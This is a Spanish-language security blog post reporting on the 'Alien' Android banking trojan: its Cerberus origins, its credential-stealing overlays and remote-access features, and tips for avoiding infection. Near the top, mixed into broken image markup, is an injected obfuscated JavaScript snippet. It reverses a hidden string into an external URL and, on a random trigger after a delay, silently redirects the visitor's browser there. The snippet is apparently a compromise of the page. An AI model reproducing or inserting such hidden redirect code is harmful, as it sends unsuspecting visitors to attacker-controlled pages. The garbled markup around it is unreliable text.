Se reporta un malware que roba contraseñas de Instagram, Facebook, Twitter
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tos/2020/09/hack.jpg?i<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tok=TGxqZ_t” width=”1280″ height=”864″ />
La app aparenta ser una herramienta de asistencia y vulneró las barreras de seguridad.
El malware, bautizado “Alien” por especialistas en informática, opera desde comienzos del año y es capaz de robar contraseñas de 226 aplicaciones muy populares. En el listado se encuentran Facebook, WhatsApp, Instagram y Twitter.
De acuerdo a los expertos, este virus troyano está basado en un atacante anterior, conocido como “Cerberus”. Indican que el programa estuvo disponible en 2019 en foros clandestinos para que piratas informáticos accedan a él.
En el reporte se indica que Google detectó a Cerberus y lo eliminó. El creador del malware lo publicó gratis en la dark web, permitiendo que otros ciberdelincuentes usen el código fuente del mismo, y es así como se generó “Alien”. Se indica que Alien llega a los dispositivos por diferentes vías, desde campañas de phishing, a través de mensajes de texto (SMS), con la descarga de ciertas apps maliciosas o en archivos adjuntos, entre otras opciones.
¿Qué hace Alien?
“Alien” no sólo consigue hacerse de contraseñas de cientos de aplicaciones. Una vez que infecta el dispositivo se enfoca en el robo de datos bancarios. Lo que hace es poner en pantalla una interfaz idéntica a la página de inicio de las aplicaciones, solicitando datos personales. De esa forma, no se accede a la app en cuestión sino que se lo otorgan los datos al atacante cibernético.
Además, tiene acceso remoto al teléfono u otros dispositivos, recolecta y puede enviar mensajes de texto, obtiene datos de los contactos y la ubicación geográfica del usuario. Incluso puede bloquear la pantalla e instalar nuevas aplicaciones.
Cómo evitarlos
No instales aplicaciones de fuentes poco fiables, no descargues archivos adjuntos incluidos en correos electrónicos de personas desconocidas y no visites los enlaces que te lleguen en mensajes de texto sospechosos. (I)
Ver información original al respecto en Fuente>
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.